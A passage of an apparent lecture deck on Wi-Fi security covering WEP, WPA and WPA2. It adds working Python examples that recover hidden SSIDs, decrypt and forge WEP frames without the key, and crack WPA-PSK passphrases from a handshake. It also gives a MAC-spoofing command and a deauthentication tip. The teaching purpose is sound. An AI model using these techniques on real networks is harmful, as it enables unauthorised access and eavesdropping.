        Maximum single-link throughput of at least 500 Mbps
  • 6. Wireless Network Modes
     802.11 wireless networks operate in two basic modes:
       1. Infrastructure mode
       2. Ad-hoc mode
     Infrastructure mode:
        Each wireless client connects directly to a central device called an Access Point (AP)
        No direct connection between wireless clients
        The AP acts as a wireless hub: it sets up and relays all connections between wireless clients
  • 7. Wireless Network Modes (cont’d)
     The AP handles:
        the clients’ authentication,
        authorization,
        link-level data security (access control and enabling data traffic encryption)
     Ad-hoc mode:
        Wireless clients connect directly to each other
        No central device managing the connections
        Rapid deployment of a temporary network where no infrastructure exists (an advantage in case of disaster...)
        Each node must maintain its own authentication list
  • 8. SSID – Service Set Identifier
     Identifies a particular wireless network
     A client must set the same SSID as the one configured in that particular AP to join the network
     Without the SSID, the client won’t be able to select and join a wireless network
     Hiding the SSID is not a security measure: the wireless network is not invisible, its beacons simply stop naming it
     It can be recovered by intruders by sniffing any probe request, probe response or association request that carries it
  • 9. SSID (Cont’d)
     A way for vendors to make more money
     So easy to find the ID of a “hidden” network: beacon broadcasting cannot be turned off (the beacon is sent with an empty SSID field), and every client that joins sends the name in the clear
     Simply use a utility to show all the current networks:
        inSSIDer
        NetStumbler
        Kismet
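How the SSID of a “hidden” network leaks, as an added worked example (this is not code from the deck): a minimal parser for 802.11 management frames that reads the SSID element and harvests the network name from the probe and association frames that still carry it while the beacon carries an empty one. The frame builder, the MAC addresses and the network name are constructed sample data standing in for a capture; field layouts follow IEEE 802.11-2007 clause 7.2.3.

```python
# Management-frame subtypes and the length of the fixed (non-IE) fields that
# precede the tagged parameters (IEEE 802.11-2007, clause 7.2.3).
MGMT_FIXED_LEN = {0: 4, 4: 0, 5: 12, 8: 12}
SUBTYPE_NAME = {0: "association request", 4: "probe request",
                5: "probe response", 8: "beacon"}
BROADCAST = b"\xff" * 6


def build_mgmt_frame(subtype, sa, bssid, ssid, da=None):
    """Construct a minimal management frame (sample data, not a real capture)."""
    da = bssid if da is None else da
    frame_control = bytes([subtype << 4, 0])          # type 00 = management
    header = (frame_control + b"\x00\x00"              # duration
              + da + sa + bssid + b"\x00\x00")         # addr1/addr2/addr3, seq ctrl
    fixed = bytes(MGMT_FIXED_LEN[subtype])             # timestamp/interval/capability, zeroed
    ssid_ie = bytes([0, len(ssid)]) + ssid             # element ID 0 = SSID
    rates_ie = bytes([1, 4, 0x82, 0x84, 0x8B, 0x96])   # element ID 1 = supported rates
    return header + fixed + ssid_ie + rates_ie


def parse_ies(body):
    """Split the tagged-parameter area into {element_id: value}."""
    ies, i = {}, 0
    while i + 2 <= len(body):
        eid, length = body[i], body[i + 1]
        ies[eid] = body[i + 2:i + 2 + length]
        i += 2 + length
    return ies


def ssid_from_frame(frame):
    """Return (subtype name, BSSID, SSID or None) for a management frame we understand."""
    fc0 = frame[0]
    subtype = fc0 >> 4
    if (fc0 & 0x0C) != 0 or subtype not in MGMT_FIXED_LEN:
        return None                                    # data/control frame or other subtype
    bssid = frame[16:22]                               # addr3
    ies = parse_ies(frame[24 + MGMT_FIXED_LEN[subtype]:])
    ssid = ies.get(0)
    # A "hidden" network still beacons; its SSID element is just empty or NUL-filled.
    if not ssid or not ssid.strip(b"\x00"):
        return SUBTYPE_NAME[subtype], bssid, None
    return SUBTYPE_NAME[subtype], bssid, ssid.decode("utf-8", "replace")


def recover_ssids(frames):
    """Map BSSID -> (SSID, frame type it leaked from), from any frame that names it."""
    learned = {}
    for frame in frames:
        parsed = ssid_from_frame(frame)
        if parsed is None:
            continue
        kind, bssid, ssid = parsed
        # Probe requests carry the name but a wildcard BSSID; probe responses and
        # association requests tie the name to the AP's address.
        if ssid and bssid != BROADCAST and bssid not in learned:
            learned[bssid] = (ssid, kind)
    return learned


# Constructed sample capture: a hidden AP and one client joining it.
AP = bytes.fromhex("001122334455")
STA = bytes.fromhex("66778899aabb")
NAME = b"corp-hidden"
CAPTURE = [
    build_mgmt_frame(8, AP, AP, b"", da=BROADCAST),           # beacon with empty SSID
    build_mgmt_frame(4, STA, BROADCAST, NAME, da=BROADCAST),  # client probes for it by name
    build_mgmt_frame(5, AP, AP, NAME, da=STA),                # AP answers with the name
    build_mgmt_frame(0, STA, AP, NAME),                       # association request repeats it
]

if __name__ == "__main__":
    for f in CAPTURE:
        print(ssid_from_frame(f))
    print(recover_ssids(CAPTURE))
```

Kismet does the same harvesting on a live interface in monitor mode: a passive listener only has to wait for one client to probe for or associate with the hidden network. Sending a deauthentication to a connected client (slide 38) shortens that wait to seconds.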
  • 10. IEEE 802.11 Security – Access control list
     Access control list
        Simplest security measure
        Filters out unknown users
        Requires a list of authorized clients’ MAC addresses to be loaded into the AP
        Does not protect the wireless client, nor the confidentiality and integrity of its traffic, and the MAC address itself travels in the clear in every frame ===> vulnerable
     Defeated by MAC spoofing:
        ifconfig eth0 hw ether 00:01:02:03:04:05 (Linux)
        SMAC – KLC Consulting (Windows)
        MAC Makeup – H&C Works (Windows)
  • 11. WEP – Wired Equivalent Privacy
     The original native security mechanism for WLANs
     Provides security over an 802.11 network
     Used to protect wireless communication from eavesdropping (confidentiality)
     Prevents unauthorized access to a wireless network (access control)
     Prevents tampering with transmitted messages (integrity)
     Intended to give users a level of privacy equivalent to that of a wired network (hence the name)
  • 12. WEP
    1. Appends a 32-bit CRC checksum (the ICV) to each outgoing frame (INTEGRITY)
    2. Encrypts the frame using the RC4 stream cipher with a 40-bit (standard) or 104-bit (enhanced) secret key prefixed by a 24-bit initialization vector (IV) (CONFIDENTIALITY)
    3. The IV and the default key configured on the station or access point are concatenated to form the per-packet RC4 key, which generates a keystream
    4. The keystream is XORed with the plaintext message (plus ICV) to produce the WEP-encrypted frame; the IV is sent in the clear in front of it
  • 13. Encrypted WEP frame (figure)
  • 14. RC4 keystream XORed with plaintext (figure)
  • 15. WEP Components
     Initialization Vector (IV)
        Dynamic 24-bit value
        Chosen by the transmitting wireless network interface (the standard does not require it to be random)
        2^24 = 16.7 million possible IVs
     Shared Secret Key
        40 bits long (5 ASCII characters) when a “64-bit” key is used
        104 bits long (13 ASCII characters) when a “128-bit” key is used
  • 16. WEP Components (cont’d)
     The RC4 algorithm consists of 2 main parts:
       1. The Key Scheduling Algorithm (KSA):
           Creates a scrambled state array from the key
           This state array is then used as input to the second phase, the PRGA
       2. The Pseudo-Random Generation Algorithm (PRGA):
           The state array from the KSA is used here to generate the keystream
           Each byte of the keystream is XORed with the corresponding plaintext byte to produce the ciphertext
  • 17. WEP Components (cont’d)
     ICV (Integrity Check Value) = CRC-32 (cyclic redundancy check) integrity check
     XOR operation, denoted ⊕
        plaintext ⊕ keystream = ciphertext
        ciphertext ⊕ keystream = plaintext
        plaintext ⊕ ciphertext = keystream
  • 18. How WEP works (figure: IV and key feed RC4; the original unencrypted packet plus checksum is XORed with the keystream; the IV is prepended to the encrypted packet)
  • 19. Encryption Process (figure)
  • 20. Decryption Process (figure)
  • 21. WEP Authentication (shared-key)
    1. The station sends an authentication request to the AP
    2. The AP sends a challenge text (128 bytes) to the station
    3. The station encrypts the challenge text with its configured 64-bit or 128-bit default key and sends the result to the AP
    4. The AP decrypts the encrypted text using its configured WEP key that corresponds to the station’s default key
    5. The AP compares the decrypted text with the original challenge text
    6. If they match, the access point and the station share the same WEP key, and the access point authenticates the station
    7. The station associates with the network
  • 22. WEP Authentication (Cont’d) (figure)
  • 23. WEP Authentication (Cont’d)
     There is a well-documented vulnerability in shared-key authentication
     The authentication process leaks the keystream
     It is possible to derive the keystream used for the handshake by capturing the challenge and response frames of a shared-key authentication
     SKA is regarded as insecure
     The problem is that a passive attacker observes both the challenge (plaintext) and the encrypted response (ciphertext), together with the IV the station chose:
        XORing the two gives the RC4 keystream used to encrypt the response
        He can reuse that keystream, under the same IV, to encrypt any challenge he receives in the future, and so authenticates without ever knowing the key
  • 24. WEP flaws and vulnerabilities
     Weak keys:
        RC4 has classes of weak (IV || key) values whose first keystream bytes leak key bytes (the FMS attack)
        This allows an attacker to recover the default key used by the access point and client stations
        Once the key is known, every message sent over the encrypted channel can be decrypted
     IV reuse and small size:
        There are only 2^24 different IVs
        On a busy network the IV will surely be reused; if the default key has not been changed, two frames under the same IV share a keystream, and the original messages can be retrieved relatively easily
  • 25. WEP flaws and vulnerabilities (cont’d)
     With IV reuse it is possible to determine keystreams, which lets an attacker forge packets and gain access to the WLAN
     A 40-bit WEP key falls faster than a 104-bit one, but the attacks above recover either, so both are very weak and unable to secure Wi-Fi networks
     Uses a weak authentication algorithm (shared-key challenge/response)
     Uses a weak data encapsulation method (RC4 with a per-packet key that is IV || static key)
     Uses an improper integrity algorithm, i.e. CRC-32, which is linear and unkeyed, so ciphertext bits can be flipped and the ICV fixed up without the key
     Lack of mutual authentication and key management
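The WEP encapsulation of slides 12 to 20 and the three key-free attacks of slides 23 to 25 (keystream recovery under a reused IV, the shared-key authentication replay, and CRC-32 bit flipping), as an added worked example in Python; this is not code from the deck or from any tool it lists. RC4 is implemented from the KSA/PRGA description on slide 16; the 40-bit key, the IVs and the payloads are constructed test data, and the key-ID byte of the real frame format is omitted for brevity.

```python
import os
import zlib


def rc4_ksa(key):
    """Key Scheduling Algorithm (slide 16): permute the state array S under the key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_prga(s, n):
    """Pseudo-Random Generation Algorithm: emit n keystream bytes from state S."""
    s, i, j, out = s[:], 0, 0, bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_keystream(key, n):
    return rc4_prga(rc4_ksa(key), n)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data):
    """WEP ICV: CRC-32 of the plaintext, little-endian on the wire."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encapsulate(secret, plaintext, iv=None):
    """IV || RC4(IV || secret)(plaintext || ICV). The IV travels in the clear."""
    iv = os.urandom(3) if iv is None else iv
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4_keystream(iv + secret, len(body)))


def wep_decapsulate(secret, frame):
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4_keystream(iv + secret, len(ct)))
    data, tag = body[:-4], body[-4:]
    if tag != icv(data):
        raise ValueError("ICV check failed")
    return data


# --- Attacks that need no knowledge of the secret key ---------------------

def keystream_from_known_plaintext(frame, plaintext):
    """Slide 17: ciphertext XOR plaintext = keystream for this frame's IV."""
    return xor(frame[3:], plaintext + icv(plaintext))


def decrypt_with_reused_iv(frame, keystream):
    """Slide 24: a second frame under the same IV shares the keystream."""
    return xor(frame[3:], keystream)[:-4]


def forge_shared_key_response(challenge, response, new_challenge):
    """Slide 23: one captured (challenge, response) pair answers any future challenge."""
    ks = keystream_from_known_plaintext(response, challenge)
    body = new_challenge + icv(new_challenge)
    return response[:3] + xor(body, ks)     # reuse the IV the keystream belongs to


def flip_bits(frame, delta):
    """Slide 25: CRC-32 is linear, so flip ciphertext bits and patch the encrypted ICV."""
    iv, ct = frame[:3], frame[3:]
    data_ct, icv_ct = ct[:-4], ct[-4:]
    if len(delta) != len(data_ct):
        raise ValueError("delta must cover the whole payload")
    # crc(m ^ d) == crc(m) ^ crc(d) ^ crc(0...0) for equal-length inputs
    fix = xor(icv(delta), icv(bytes(len(delta))))
    return iv + xor(data_ct, delta) + xor(icv_ct, fix)


SECRET = b"\x01\x02\x03\x04\x05"        # constructed 40-bit WEP key

if __name__ == "__main__":
    f1 = wep_encapsulate(SECRET, b"hello wireless", iv=b"\x0a\x0b\x0c")
    ks = keystream_from_known_plaintext(f1, b"hello wireless")
    f2 = wep_encapsulate(SECRET, b"secret payload", iv=b"\x0a\x0b\x0c")
    print(decrypt_with_reused_iv(f2, ks))
    money = wep_encapsulate(SECRET, b"transfer 100")
    delta = bytes(9) + b"\x08" + bytes(2)              # '1' (0x31) -> '9' (0x39)
    print(wep_decapsulate(SECRET, flip_bits(money, delta)))
```

Note what none of the attack functions take: the secret. Known plaintext is easy to come by on a real WLAN (ARP requests and IP headers have fixed bytes), so every IV collision hands the attacker a keystream, and the forged response and bit-flipped frame pass the AP’s ICV check exactly as a genuine frame would.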
  • 26. Attacks on WEP
     WEP-encrypted networks can be cracked in about 10 minutes
     The goal is to collect enough IVs (with their first keystream bytes) to be able to crack the key
     IV = Initialization Vector, a cleartext value prepended to the secret key (IV || key) so that successive frames use different RC4 keys
     Injecting packets (e.g. replaying captured ARP requests) forces the AP to generate new IVs quickly
  • 27. Attacks on WEP
     BackTrack 5 (R2 released 1st March 2012)
     A tutorial is available
     All required tools on a Linux bootable CD + laptop + wireless card
  • 28. WEP cracking example (figure)
  • 29. WPA – Wi-Fi Protected Access
     New technique in 2002
     Introduced as a replacement that fixes the security flaws of WEP
     Improved data encryption
     Strong user authentication
     Because of the many attacks related to the static key, WPA no longer uses one shared secret directly: it derives a fresh key for every frame transmitted
     Uses the RC4 algorithm in a proper way (per-packet keys) so that existing hardware can still be used
  • 30. WPA
     Data is encrypted using the RC4 stream cipher, with a 128-bit key and a 48-bit initialization vector (IV)
     One major improvement in WPA over WEP is the Temporal Key Integrity Protocol (TKIP), which dynamically changes keys as the system is used
     Combined with the much larger IV, this defeats the well-known key recovery attacks on WEP
     WPA also provides vastly improved payload integrity
  • 31. WPA
     A more secure message authentication code (usually known as a MAC, but here termed a MIC for “Message Integrity Code”) is used in WPA, an algorithm named “Michael”
     The MIC used in WPA includes a frame counter, which prevents replay attacks
     Michael is a lightweight algorithm, deliberately cheap (and comparatively weak) so that it still runs on most older network cards; that weakness is why TKIP needs countermeasures
     WPA includes a special countermeasure mechanism that detects an attempt to break TKIP (two MIC failures within 60 seconds), suspends TKIP traffic for 60 seconds and rekeys
  • 32. WPA (figure)
  • 33. How WPA Addresses the WEP Vulnerabilities
     WPA wraps the RC4 cipher engine in four new algorithms:
       1. Extended 48-bit IV and IV sequencing rules
           2^48 is a large number! About 281 trillion
           Sequencing rules specify how IVs are selected and verified (out-of-order packets are dropped)
       2. A Message Integrity Code (MIC) called Michael
           Designed for deployed hardware
           Requires use of active countermeasures
       3. Key derivation and distribution
           Initial random number exchanges (nonces) defeat man-in-the-middle attacks
       4. Temporal Key Integrity Protocol generates per-packet keys
  • 34. WPA2 – Wi-Fi Protected Access 2
     Based on the IEEE 802.11i standard
     2 versions: Personal & Enterprise
     The primary enhancement over WPA is the use of the AES (Advanced Encryption Standard) algorithm
     Encryption in WPA2 uses AES-CCMP (mandatory); TKIP is retained only for compatibility with WPA clients
     Personal mode uses a PSK (pre-shared key) and does not require separate authentication of users
     Enterprise mode requires users to be authenticated separately, using the EAP protocol over 802.1X
  • 35. WPA2
     WPA2 uses AES with a 128-bit key to encrypt the data
     AES is used through the Counter-Mode/CBC-MAC Protocol (CCMP)
     CCMP uses the same temporal key for both encryption (counter mode) and authentication (CBC-MAC), with a nonce built from the packet number so that no (key, nonce) pair is ever reused
  • 36. WPA2
     WPA2 resists many types of attacks:
        Man-in-the-middle
        Authentication forging
        Replay
        Key collision
        Weak keys
        Packet forging
        Dictionary attacks (Enterprise mode only; WPA2-Personal with a weak passphrase remains exposed, see slide 38)
  • 37. WPA2 weaknesses
     Can’t protect against upper-layer session hijacking
     Can’t defend against physical-layer attacks:
        RF jamming
        Data flooding
        Access point failure
     Vulnerable to MAC address spoofing (and to unprotected management frames such as deauthentication)
  • 38. Am I secure if I use WPA-PSK?
     WPA-PSK protected networks are vulnerable to dictionary attacks
     Works against WPA & WPA2 (802.11i)
     New attack techniques have increased the speed of this attack – coWPAtty 4.6
     Run coWPAtty against the captured packets to crack the key
     Needs the SSID to crack the WPA-PSK (it is the salt of the key derivation), easily obtainable!
     Also supports WPA2-PSK cracking with the same pre-computed tables, since the PMK derivation is identical
     Spoof the MAC address of the AP and send the client a deauthentication, so that it reconnects
     Sniff the wireless network for the WPA-PSK 4-way handshake (EAPOL frames)
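What the dictionary attack on slide 38 actually computes, as an added Python example rather than a tool from the deck: the 802.11i derivation PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32), the PTK from the nonces and MAC addresses seen in the 4-way handshake, and the MIC over EAPOL message 2, which is the only thing a guess can be checked against. The handshake is simulated (the SSID, passphrase, MAC addresses, nonces and wordlist are constructed), and message 2 is built with the RSN key descriptor, version 2, whose MIC is HMAC-SHA1 truncated to 128 bits as used by WPA2-CCMP; WPA/TKIP uses HMAC-MD5 for the MIC but the same PMK and PTK derivation.

```python
import hashlib
import hmac

MIC_OFFSET = 81   # EAPOL header (4) + offset of Key MIC inside the EAPOL-Key descriptor (77)


def pmk_from_passphrase(passphrase, ssid):
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk, aa, spa, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs || min/max of nonces)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)   # KCK = PTK[0:16]


def eapol_mic(kck, frame):
    """Key descriptor version 2: HMAC-SHA1 truncated to 128 bits over the frame, MIC zeroed."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce, mic=bytes(16)):
    """Constructed 4-way handshake message 2 (supplicant -> AP) carrying SNonce and MIC."""
    descriptor = (b"\x02"                          # descriptor type: RSN
                  + b"\x01\x0a"                    # key info: MIC set, pairwise, version 2
                  + b"\x00\x10"                    # key length 16 (CCMP)
                  + (1).to_bytes(8, "big")         # replay counter
                  + snonce + bytes(16) + bytes(8) + bytes(8)   # nonce, IV, RSC, key ID
                  + mic + b"\x00\x00")             # MIC, key data length 0
    return b"\x01\x03" + len(descriptor).to_bytes(2, "big") + descriptor


def mic_for_candidate(passphrase, ssid, aa, spa, anonce, snonce, msg2):
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return eapol_mic(kck, msg2)


def dictionary_attack(wordlist, ssid, aa, spa, anonce, snonce, msg2):
    """Offline: every guess costs one PBKDF2 (4096 HMACs); nothing touches the AP."""
    target = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        if hmac.compare_digest(mic_for_candidate(word, ssid, aa, spa, anonce, snonce, msg2), target):
            return word
    return None


# Constructed handshake: a weak passphrase on a lab SSID.
SSID = "CSI5169-lab"
PASSPHRASE = "letmein2012"
AA = bytes.fromhex("001122334455")    # authenticator (AP) address
SPA = bytes.fromhex("66778899aabb")   # supplicant (client) address
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
WORDLIST = ["password", "12345678", "letmein2012", "qwertyuiop"]


def capture_handshake_msg2():
    """What the supplicant really sends: message 2 with a valid MIC under the true PSK."""
    kck = derive_ptk(pmk_from_passphrase(PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return build_eapol_msg2(SNONCE, mic=eapol_mic(kck, build_eapol_msg2(SNONCE)))


if __name__ == "__main__":
    msg2 = capture_handshake_msg2()
    print(dictionary_attack(WORDLIST, SSID, AA, SPA, ANONCE, SNONCE, msg2))
```

Two consequences fall out of the derivation. The SSID is the PBKDF2 salt, which is why coWPAtty needs it and why its pre-computed PMK tables (genpmk) are built per SSID and serve WPA and WPA2 alike. And the 4096 PBKDF2 iterations are the only cost the attacker pays per guess, so a passphrase drawn from a wordlist falls regardless of the cipher; entropy in the passphrase, or Enterprise mode with 802.1X, is the actual defence.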
  • 39. WPA Cracking Example (figure)
  • 40. WEP vs WPA vs WPA2

                        WEP                       WPA                         WPA2
    ENCRYPTION          RC4                       RC4 (TKIP)                  AES (CCMP)
    KEY ROTATION        None                      Dynamic session keys        Dynamic session keys
    KEY DISTRIBUTION    Manually typed into       Automatic distribution      Automatic distribution
                        each device               available                   available
    AUTHENTICATION      Uses WEP key as           Can use 802.1X & EAP        Can use 802.1X & EAP
                        authentication

  • 41. Procedures to improve wireless security
     Use a wireless intrusion prevention system (WIPS)
     Enable WPA-PSK at minimum
     Use a good passphrase (https://grc.com/password)
     Use WPA2 where possible
     AES (CCMP) is more secure; use TKIP only where legacy hardware forces it
     Change your SSID every so often
     Wireless network users should use or upgrade their network to the latest security standard released
  • 42. Wireless Network tools
     MAC Spoofing
        http://aspoof.sourceforge.net/
        http://www.gorlani.com/publicprj/macmakeup/macmakeup.asp
        http://www.klcconsulting.net/smac/
     WEP Cracking tools
        http://www.backtrack-linux.org/
        http://www.remote-exploit.org/articles/backtrack/index.html
        http://wepattack.sourceforge.net/
        http://wepcrack.sourceforge.net/
     Wireless Analysers
        http://www.kismetwireless.net/
        http://www.netstumbler.com/
  • 43. Questions
    Q1) Given the ciphertext 11010110 and the plaintext 00110101, compute the keystream.
    A1)
        ciphertext: 1 1 0 1 0 1 1 0
        plaintext:  0 0 1 1 0 1 0 1
        keystream:  1 1 1 0 0 0 1 1
        Encrypting: plaintext ⊕ keystream = ciphertext
        Decrypting: ciphertext ⊕ keystream = plaintext
  • 44. Questions (Cont’d)
    Q2) Why is SSID hiding (disabling SSID broadcast) not 100% effective?
    A2) Beacon broadcasting cannot be turned off, and attackers can still detect the SSID by sniffing the probe and association messages that carry it, using tools such as Kismet.
  • 45. Questions (Cont’d)
    Q3) List 4 WEP vulnerabilities.
    A3)
        1. The Initialization Vector (IV) is too small
        2. The Integrity Check Value (ICV) algorithm (CRC-32) is not appropriate
        3. WEP’s use of RC4 (IV || static key) is weak
        4. Authentication messages can be easily forged
  • 46. REFERENCES
    1. Hytnen, R., and Garcia, M. An Analysis of Wireless Security. 2006.
    2. Whalen, S. Analysis of WEP and RC4 Algorithms. March 2002.
    3. http://en.wikipedia.org/wiki/IEEE_802.1X
    4. IEEE Std 802.11-2007. Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications. June 2007.
    5. http://en.wikipedia.org/wiki/Wired_Equivalent_Privacy
    6. http://en.wikipedia.org/wiki/Advanced_Encryption_Standard
  • 47. Thank You! Questions?